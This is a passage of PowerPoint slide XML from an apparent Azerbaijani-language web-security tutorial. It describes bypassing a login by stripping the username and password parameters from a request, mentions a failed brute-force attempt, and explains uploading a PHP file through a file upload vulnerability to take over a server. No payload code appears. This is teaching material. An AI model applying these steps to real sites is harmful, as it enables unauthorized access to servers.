            <a:ext cx="64202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40" name="Şəkil 4" descr="Şəkil ehtiva edir stol  Avtomatik yaradılan təsvir"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9683221" cy="6858000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048791" name="Mətn Qutusu 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9607021" y="289679"/>
            <a:ext cx="2584979" cy="2491741"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="az-Latn-AZ" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>BruteForce</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>hücumu bitdikdən sonra </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Length</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>bölməsinə baxırıq</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="az-Latn-AZ" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="az-Latn-AZ" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Hər şeyin eyni </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Ienghtə</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> malik olduğunu görürük birini seçdikdə </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>yənə</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> nəticənin uğursuz olduğunu görürük</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="az-Latn-AZ" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="az-Latn-AZ" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="800000"/>
                </a:highlight>
              </a:rPr>
              <a:t>NOT AUTHENTİCATED</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048792" name="Mətn Qutusu 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9607020" y="3718679"/>
            <a:ext cx="2584979" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>3 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>cü</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> üsula keçirik</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41" name="Şəkil 4" descr="Şəkil ehtiva edir mətn  Avtomatik yaradılan təsvir"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect l="581" t="15501" r="62531" b="53263"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="4007796"/>
            <a:ext cx="4863830" cy="2850204"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2097242" name="Şəkil 6" descr="Şəkil ehtiva edir mətn  Avtomatik yaradılan təsvir"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3"/>
          <a:srcRect l="925" t="3026" r="6571"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4863831" y="0"/>
            <a:ext cx="7328170" cy="6858000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048793" name="Mətn Qutusu 9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="216816"/>
            <a:ext cx="4647414" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>3) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Username</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Pass</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>word – Aradan qald</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ırma</a:t>
            </a:r>
            <a:endParaRPr lang="az-Latn-AZ" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048794" name="Mətn Qutusu 10"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="97277" y="826851"/>
            <a:ext cx="4550137" cy="1958341"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="az-Latn-AZ" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Bu üsulda </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>linkdəki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>isitifadəçi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> adı </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>və </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>parol </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>girişini tamam silirik və bağlantını yenidən göndəririk</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="az-Latn-AZ" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr lang="az-Latn-AZ" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="az-Latn-AZ" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Nəticəyə baxırıq və </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="008000"/>
                </a:highlight>
              </a:rPr>
              <a:t>AUTHENTİCATED</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="az-Latn-AZ" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="az-Latn-AZ" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>yazısını görürük və nəticə bu üsulda uğurlu olur.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048795" name="Düzbucaqlı 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9309370" y="4659550"/>
            <a:ext cx="924128" cy="18482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96" name="Düzbucaqlı 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1838528" y="4593943"/>
            <a:ext cx="2286000" cy="250432"/>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
        <p:nvSpPr>
          <p:cNvPr id="1048797" name="Düzbucaqlı 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4953000" y="1147864"/>
            <a:ext cx="2286000" cy="17509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48798" name="Başlıq 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="358901" y="139827"/>
            <a:ext cx="7994523" cy="1880553"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="6600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>File</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="6600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="6600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Upload</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="az-Latn-AZ" sz="6600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="6600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>    Təhlükəsizlik açığı</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048799" name="Mətn Qutusu 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="200026" y="2333625"/>
            <a:ext cx="11544300" cy="2677656"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Veb shifəsi vasitəsi ilə serverə zərərli proqram yüklənərək edilən hücumlara verilən addır. Təcavüzkar hazırladığı ssenarini səhv sazlanmış </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>veb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> saytına yükləyərək uzaq serveri ələ keçirə bilər.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="az-Latn-AZ" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Fayl yükləmə zəifliyi sadə bir zəiflikdir. Zəifliyin nəticələrini və istismarının asanlığını nəzərə alsaq, xırda bir zəiflik olmadığı ortaya çıxacaq.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="az-Latn-AZ" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048882" name="Metin kutusu 1048881"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9117676" y="323184"/>
            <a:ext cx="2161400" cy="1513839"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="tr" sz="9600">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>✅</a:t>
            </a:r>
            <a:endParaRPr lang="tr-TR" sz="2800">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43" name="Şəkil 4" descr="Şəkil ehtiva edir stol  Avtomatik yaradılan təsvir"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect t="46721"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9270972" cy="3023177"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2097244" name="Şəkil 6"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3"/>
          <a:srcRect l="1022"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="3023177"/>
            <a:ext cx="9270972" cy="3834823"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048800" name="Mətn Qutusu 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9202878" y="219075"/>
            <a:ext cx="2921028" cy="5262979"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>File Upload </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>bölməsinə giririk </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="az-Latn-AZ" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr lang="az-Latn-AZ" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Fayl yüklüyə biləcəyimiz shifə açılır bu hər hansl bir saytda profil şəkili deyişmə shifəsi  , universitetin serveri və.s ola bilər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45" name="Şəkil 4" descr="Şəkil ehtiva edir mətn, monitor, elektronika, içəri  Avtomatik yaradılan təsvir"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect t="17961"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="29183"/>
            <a:ext cx="6011694" cy="4990289"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2097246" name="Şəkil 6" descr="Şəkil ehtiva edir mətn, monitor, qara, ani görüntü  Avtomatik yaradılan təsvir"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3"/>
          <a:srcRect l="12301" t="7910"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6011694" y="0"/>
            <a:ext cx="6180306" cy="5727372"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048801" name="Mətn Qutusu 10"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="131324" y="5012935"/>
            <a:ext cx="5836596" cy="1384995"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>İlk olaraq boş bir </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> faylı açırıq</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="az-Latn-AZ" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sonra faylı həmən təhlükəsizlik açığı olan shifəyə yükləyirik.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47" name="Şəkil 4" descr="Şəkil ehtiva edir mətn  Avtomatik yaradılan təsvir"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-1" y="-1"/>
            <a:ext cx="7116867" cy="3132307"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2097248" name="Şəkil 6" descr="Şəkil ehtiva edir mətn  Avtomatik yaradılan təsvir"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3"/>
          <a:srcRect l="639" r="1220"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="10577" y="3132306"/>
            <a:ext cx="7106289" cy="2312148"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048802" name="Mətn Qutusu 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7116866" y="181158"/>
            <a:ext cx="5149712" cy="3075940"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="4000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Fayl </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="4000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="008000"/>
                </a:highlight>
              </a:rPr>
              <a:t>uğurlu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="4000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> şəkildə yüklənir və </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="4000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>here</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="4000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> yazısının üzərinə basdıqda yazdığımız </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="4000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent6">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="4000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> faylı açılır</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048803" name="Mətn Qutusu 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7127444" y="3443514"/>
            <a:ext cx="4954309" cy="2062103"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="3200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Bundan istifadə edərək shifəyə </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="az-Latn-AZ" sz="3200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="3200" dirty="0">
                <a:solidFill>
